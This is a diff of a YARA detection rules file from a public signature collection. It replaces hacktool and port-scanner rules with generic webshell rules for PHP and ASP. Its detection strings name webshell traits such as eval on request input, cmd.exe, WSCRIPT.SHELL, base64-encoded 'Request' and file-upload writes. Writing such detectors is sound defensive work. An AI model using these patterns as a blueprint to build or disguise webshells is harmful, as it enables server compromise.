+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2820-L2910"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ff9d7c3e83fd27620559306c07556ce7afd1ba7a5db5f5c21ad0841d58b85014"
-		score = 60
-		quality = 85
-		tags = ""
+		hash = "ec83d69512aa0cc85584973f5f0850932fb1949fb5fb2b7e6e5bbfb121193637"
+		hash = "407c15f94a33232c64ddf45f194917fabcd2e83cf93f38ee82f9720e2635fa64"
+		hash = "988b125b6727b94ce9a27ea42edc0ce282c5dfeb"
+		hash = "0ce760131787803bbef216d0ee9b5eb062633537"
+		hash = "20281d16838f707c86b1ff1428a293ed6aec0e97"
+		logic_hash = "34bae0c02156d1c9fd24d674443322409eba0a43e094fc6c05df94bbbe15aa64"
+		score = 50
+		quality = 42
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "[ValidateRange(1, 65535)]" fullword
-		$s1 = "$Client = New-Object -TypeName System.Net.Sockets.TcpClient" fullword
-		$s2 = "$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSize" fullword
+		$sus3 = "'upload'" wide ascii
+		$sus4 = "\"upload\"" wide ascii
+		$sus5 = "\"Upload\"" wide ascii
+		$sus6 = "gif89" wide ascii
+		$sus16 = "Army" fullword wide ascii
+		$sus17 = "error_reporting( 0 )" wide ascii
+		$sus18 = "' . '" wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$inp1 = "php://input" wide ascii
+		$inp2 = /_GET\s?\[/ wide ascii
+		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
+		$inp4 = /_POST\s?\[/ wide ascii
+		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
+		$inp6 = /_REQUEST\s?\[/ wide ascii
+		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
+		$inp15 = "_SERVER['HTTP_" wide ascii
+		$inp16 = "_SERVER[\"HTTP_" wide ascii
+		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
+		$inp18 = "array_values($_SERVER)" wide ascii
+		$inp19 = /file_get_contents\("https?:\/\// wide ascii
+		$php_multi_write1 = "fopen(" wide ascii
+		$php_multi_write2 = "fwrite(" wide ascii
+		$php_write1 = "move_uploaded_file" fullword wide ascii
+		$php_write2 = "copy" fullword wide ascii
 
 	condition:
-		all of them
+		(( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $inp* ) ) and ( any of ( $php_write* ) or all of ( $php_multi_write* ) ) and ( filesize < 400 or ( filesize < 4000 and 1 of ( $sus* ) ) )
 }
-rule SIGNATURE_BASE_Chinese_Hacktool_1014
+rule SIGNATURE_BASE_WEBSHELL_ASP_Writer : FILE
 {
 	meta:
-		description = "Detects a chinese hacktool with unknown use"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5db5f58-a1fd-51e0-9037-337fcca71f11"
-		date = "2014-10-10"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L585-L602"
+		description = "ASP webshell which only writes an uploaded file to disk"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a1310e22-f485-5f06-8f1a-4cf9ae8413a1"
+		date = "2021-03-07"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2912-L3082"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "98c07a62f7f0842bcdbf941170f34990"
-		logic_hash = "ffb1f653fd536a46dae4bf2c91c3c0582b703b8f0d33838b9736083e307a8e79"
+		hash = "df6eaba8d643c49c6f38016531c88332e80af33c"
+		hash = "83642a926291a499916e8c915dacadd0d5a8b91f"
+		hash = "5417fad68a6f7320d227f558bf64657fe3aa9153"
+		hash = "97d9f6c411f54b56056a145654cd00abca2ff871"
+		hash = "fc44fd7475ee6c0758ace2b17dd41ed7ea75cc73"
+		logic_hash = "7c9f4c9a5005efad02760cf9ba3ea946068ae281cda10215bf8c88f209b582a5"
 		score = 60
-		quality = 85
-		tags = ""
+		quality = -75
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "IEXT2_IDC_HORZLINEMOVECURSOR" fullword wide
-		$s1 = "msctls_progress32" fullword wide
-		$s2 = "Reply-To: %s" fullword ascii
-		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
-		$s4 = "html htm htx asp" fullword ascii
+		$sus1 = "password" fullword wide ascii
+		$sus2 = "pwd" fullword wide ascii
+		$sus3 = "<asp:TextBox" fullword nocase wide ascii
+		$sus4 = "\"upload\"" wide ascii
+		$sus5 = "\"Upload\"" wide ascii
+		$sus6 = "gif89" wide ascii
+		$sus7 = "\"&\"" wide ascii
+		$sus8 = "authkey" fullword wide ascii
+		$sus9 = "AUTHKEY" fullword wide ascii
+		$sus10 = "test.asp" fullword wide ascii
+		$sus11 = "cmd.asp" fullword wide ascii
+		$sus12 = ".Write(Request." wide ascii
+		$sus13 = "<textarea " wide ascii
+		$sus14 = "\"unsafe" fullword wide ascii
+		$sus15 = "'unsafe" fullword wide ascii
+		$sus16 = "Army" fullword wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_input1 = "request" fullword nocase wide ascii
+		$asp_input2 = "Page_Load" fullword nocase wide ascii
+		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
+		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
+		$asp_xml_method1 = "GET" fullword wide ascii
+		$asp_xml_method2 = "POST" fullword wide ascii
+		$asp_xml_method3 = "HEAD" fullword wide ascii
+		$asp_form1 = "<form " wide ascii
+		$asp_form2 = "<Form " wide ascii
+		$asp_form3 = "<FORM " wide ascii
+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
+		$asp_always_write1 = /\.write/ nocase wide ascii
+		$asp_always_write2 = /\.swrite/ nocase wide ascii
+		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
+		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
+		$asp_cr_write1 = "CreateObject(" nocase wide ascii
+		$asp_cr_write2 = "CreateObject (" nocase wide ascii
+		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
+		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
 
 	condition:
-		all of them
+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) and ( filesize < 400 or ( filesize < 6000 and 1 of ( $sus* ) ) )
 }
-rule SIGNATURE_BASE_CN_Hacktool_BAT_Portsopen
+rule SIGNATURE_BASE_WEBSHELL_ASP_OBFUSC : FILE
 {
 	meta:
-		description = "Detects a chinese BAT hacktool for local port evaluation"
-		author = "Florian Roth (Nextron Systems)"
-		id = "55c3f678-ba70-5a4a-b288-9d0953eff968"
-		date = "2014-12-10"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L604-L618"
+		description = "ASP webshell obfuscated"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3960b692-9f6f-52c5-b881-6f9e1b3ac555"
+		date = "2021-01-12"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L3084-L3359"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e5bc7b3264d7fc63fcc6c3d7e45859eb83b8ce60bd9a918f5eff887f626d09a3"
-		score = 60
-		quality = 85
-		tags = ""
+		hash = "ad597eee256de51ffb36518cd5f0f4aa0f254f27517d28fb7543ae313b15e112"
+		hash = "e0d21fdc16e0010b88d0197ebf619faa4aeca65243f545c18e10859469c1805a"
+		hash = "54a5620d4ea42e41beac08d8b1240b642dd6fd7c"
+		hash = "fc44fd7475ee6c0758ace2b17dd41ed7ea75cc73"
+		hash = "be2fedc38fc0c3d1f925310d5156ccf3d80f1432"
+		hash = "3175ee00fc66921ebec2e7ece8aa3296d4275cb5"
+		hash = "d6b96d844ac395358ee38d4524105d331af42ede"
+		hash = "cafc4ede15270ab3f53f007c66e82627a39f4d0f"
+		logic_hash = "96369062f963c3604c05808755fdfca922e5a6da960cb0ee05dee2df72d5d69b"
+		score = 75
+		quality = -117
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "for /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (" ascii
-		$s1 = "in ('tasklist /fi \"PID eq %%b\" /FO CSV') do " ascii
-		$s2 = "@echo off" ascii
+		$asp_obf1 = "/*-/*-*/" wide ascii
+		$asp_obf2 = "u\"+\"n\"+\"s" wide ascii
+		$asp_obf3 = "\"e\"+\"v" wide ascii
+		$asp_obf4 = "a\"+\"l\"" wide ascii
+		$asp_obf5 = "\"+\"(\"+\"" wide ascii
+		$asp_obf6 = "q\"+\"u\"" wide ascii
+		$asp_obf7 = "\"u\"+\"e" wide ascii
+		$asp_obf8 = "/*//*/" wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_payload0 = "eval_r" fullword nocase wide ascii
+		$asp_payload1 = /\beval\s/ nocase wide ascii
+		$asp_payload2 = /\beval\(/ nocase wide ascii
+		$asp_payload3 = /\beval\"\"/ nocase wide ascii
+		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
+		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
+		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
+		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
+		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
+		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
+		$asp_multi_payload_one2 = "addcode" fullword wide ascii
+		$asp_multi_payload_one3 = /\.run\b/ wide ascii
+		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
+		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
+		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
+		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
+		$asp_multi_payload_three2 = "Process" fullword wide ascii
+		$asp_multi_payload_three3 = ".Start" wide ascii
+		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
+		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
+		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
+		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
+		$asp_multi_payload_five2 = ".Start" nocase wide ascii
+		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
+		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
+		$asp_always_write1 = /\.write/ nocase wide ascii
+		$asp_always_write2 = /\.swrite/ nocase wide ascii
+		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
+		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
+		$asp_cr_write1 = "CreateObject(" nocase wide ascii
+		$asp_cr_write2 = "CreateObject (" nocase wide ascii
+		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
+		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
+		$o4 = "\\x8" wide ascii
+		$o5 = "\\x9" wide ascii
+		$o6 = "\\61" wide ascii
+		$o7 = "\\44" wide ascii
+		$o8 = "\\112" wide ascii
+		$o9 = "\\120" wide ascii
+		$m_multi_one1 = "Replace(" wide ascii
+		$m_multi_one2 = "Len(" wide ascii
+		$m_multi_one3 = "Mid(" wide ascii
+		$m_multi_one4 = "mid(" wide ascii
+		$m_multi_one5 = ".ToString(" wide ascii
+		$m_fp1 = "Author: Andre Teixeira - andret@microsoft.com"
+		$m_fp2 = "DataBinder.Eval(Container.DataItem" ascii wide
+		$oo1 = /\w\"&\"\w/ wide ascii
+		$oo2 = "*/\").Replace(\"/*" wide ascii
 
 	condition:
-		all of them
+		filesize < 100KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) and ( ( ( filesize < 100KB and ( ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 20 ) ) or ( filesize < 5KB and ( ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 5 or ( ( #m_multi_one1 + #m_multi_one2 + #m_multi_one3 + #m_multi_one4 + #m_multi_one5 ) > 3 ) ) ) or ( filesize < 700 and ( ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 3 or ( #m_multi_one1 + #m_multi_one2 + #m_multi_one3 + #m_multi_one4 + #m_multi_one5 ) > 2 ) ) ) or any of ( $asp_obf* ) ) or ( ( filesize < 100KB and ( ( #oo1 ) > 2 or $oo2 ) ) or ( filesize < 25KB and ( ( #oo1 ) > 1 ) ) or ( filesize < 1KB and ( ( #oo1 ) > 0 ) ) ) ) and not any of ( $m_fp* )
 }
-rule SIGNATURE_BASE_CN_Hacktool_Ssport_Portscanner
+rule SIGNATURE_BASE_WEBSHELL_ASP_Generic_Eval_On_Input : FILE
 {
 	meta:
-		description = "Detects a chinese Portscanner named SSPort"
-		author = "Florian Roth (Nextron Systems)"
-		id = "38cc8830-efd3-51b7-8ac6-c9bf468212cb"
-		date = "2014-12-10"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L620-L634"
+		description = "Generic ASP webshell which uses any eval/exec function directly on user input"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0904cefb-6e0f-5e5f-9986-cf83d409ce46"
+		date = "2021-01-07"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L3361-L3465"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "30c380b6c683cbcbef7072e793d94e1782206b844fa23d334b737818f0a32f9f"
-		score = 70
-		quality = 85
-		tags = ""
+		hash = "d6b96d844ac395358ee38d4524105d331af42ede"
+		hash = "9be2088d5c3bfad9e8dfa2d7d7ba7834030c7407"
+		hash = "a1df4cfb978567c4d1c353e988915c25c19a0e4a"
+		hash = "069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6"
+		logic_hash = "f7b9f43cf2fd6d08b7438f003242e9a19dcea282959c7a1fdff3a35e261a031e"
+		score = 75
+		quality = 1
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "Golden Fox" fullword wide
-		$s1 = "Syn Scan Port" fullword wide
-		$s2 = "CZ88.NET" fullword wide
+		$payload_and_input0 = /\beval_r\s{0,20}\(Request\(/ nocase wide ascii
+		$payload_and_input1 = /\beval[\s\(]{1,20}request[.\(\[]/ nocase wide ascii
+		$payload_and_input2 = /\bexecute[\s\(]{1,20}request\(/ nocase wide ascii
+		$payload_and_input4 = /\bExecuteGlobal\s{1,20}request\(/ nocase wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
 
 	condition:
-		all of them
+		( filesize < 1100KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and any of ( $payload_and_input* ) ) or ( filesize < 100 and any of ( $payload_and_input* ) )
 }
-rule SIGNATURE_BASE_CN_Hacktool_Scanport_Portscanner
+rule SIGNATURE_BASE_WEBSHELL_ASP_Nano : FILE
 {
 	meta:
-		description = "Detects a chinese Portscanner named ScanPort"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a708283e-339c-599f-9321-3b063d0076a9"
-		date = "2014-12-10"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L636-L650"
+		description = "Generic ASP webshell which uses any eval/exec function"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5f2f24c2-159d-51e1-80d9-11eeb77e8760"
+		date = "2021-01-13"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L3467-L3658"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fa2dce57cc3e9baecb80b0165dfeb1af1ba4c4b30098e3b1252eb98b4fc30f7f"
-		score = 70
-		quality = 60
-		tags = ""
+		hash = "3b7910a499c603715b083ddb6f881c1a0a3a924d"
+		hash = "990e3f129b8ba409a819705276f8fa845b95dad0"
+		hash = "22345e956bce23304f5e8e356c423cee60b0912c"
+		hash = "c84a6098fbd89bd085526b220d0a3f9ab505bcba"
+		hash = "b977c0ad20dc738b5dacda51ec8da718301a75d7"
+		hash = "c69df00b57fd127c7d4e0e2a40d2f6c3056e0af8bfb1925938060b7e0d8c630f"
+		hash = "f3b39a5da1cdde9acde077208e8e5b27feb973514dab7f262c7c6b2f8f11eaa7"
+		hash = "0e9d92807d990144c637d8b081a6a90a74f15c7337522874cf6317092ea2d7c1"
+		hash = "ebbc485e778f8e559ef9c66f55bb01dc4f5dcce9c31ccdd150e2c702c4b5d9e1"
+		hash = "44b4068bfbbb8961e16bae238ad23d181ac9c8e4fcb4b09a66bbcd934d2d39ee"
+		hash = "c5a4e188780b5513f34824904d56bf6e364979af6782417ccc5e5a8a70b4a95a"
+		hash = "41a3cc668517ec207c990078bccfc877e239b12a7ff2abe55ff68352f76e819c"
+		hash = "2faad5944142395794e5e6b90a34a6204412161f45e130aeb9c00eff764f65fc"
+		hash = "d0c5e641120b8ea70a363529843d9f393074c54af87913b3ab635189fb0c84cb"
+		hash = "28cfcfe28419a399c606bf96505bc68d6fe05624dba18306993f9fe0d398fbe1"
+		logic_hash = "1b969e098a0b2c86ceba9cbb7f31770ba04f1a4c225716ea27d7e4e4177c90c4"
+		score = 75
+		quality = -117
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "LScanPort" fullword wide
-		$s1 = "LScanPort Microsoft" fullword wide
-		$s2 = "www.yupsoft.com" fullword wide
+		$susasp1 = "/*-/*-*/"
+		$susasp2 = "(\"%1"
+		$susasp3 = /[Cc]hr\([Ss]tr\(/
+		$susasp4 = "cmd.exe"
+		$susasp5 = "cmd /c"
+		$susasp7 = "FromBase64String"
+		$susasp8 = "UmVxdWVzdC"
+		$susasp9 = "cmVxdWVzdA"
+		$susasp10 = "/*//*/"
+		$susasp11 = "(\"/*/\""
+		$susasp12 = "eval(eval("
+		$fp1 = "eval a"
+		$fp2 = "'Eval'"
+		$fp3 = "Eval(\""
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_payload0 = "eval_r" fullword nocase wide ascii
+		$asp_payload1 = /\beval\s/ nocase wide ascii
+		$asp_payload2 = /\beval\(/ nocase wide ascii
+		$asp_payload3 = /\beval\"\"/ nocase wide ascii
+		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
+		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
+		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
+		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
+		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
+		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
+		$asp_multi_payload_one2 = "addcode" fullword wide ascii
+		$asp_multi_payload_one3 = /\.run\b/ wide ascii
+		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
+		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
+		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
+		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
+		$asp_multi_payload_three2 = "Process" fullword wide ascii
+		$asp_multi_payload_three3 = ".Start" wide ascii
+		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
+		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
+		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
+		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
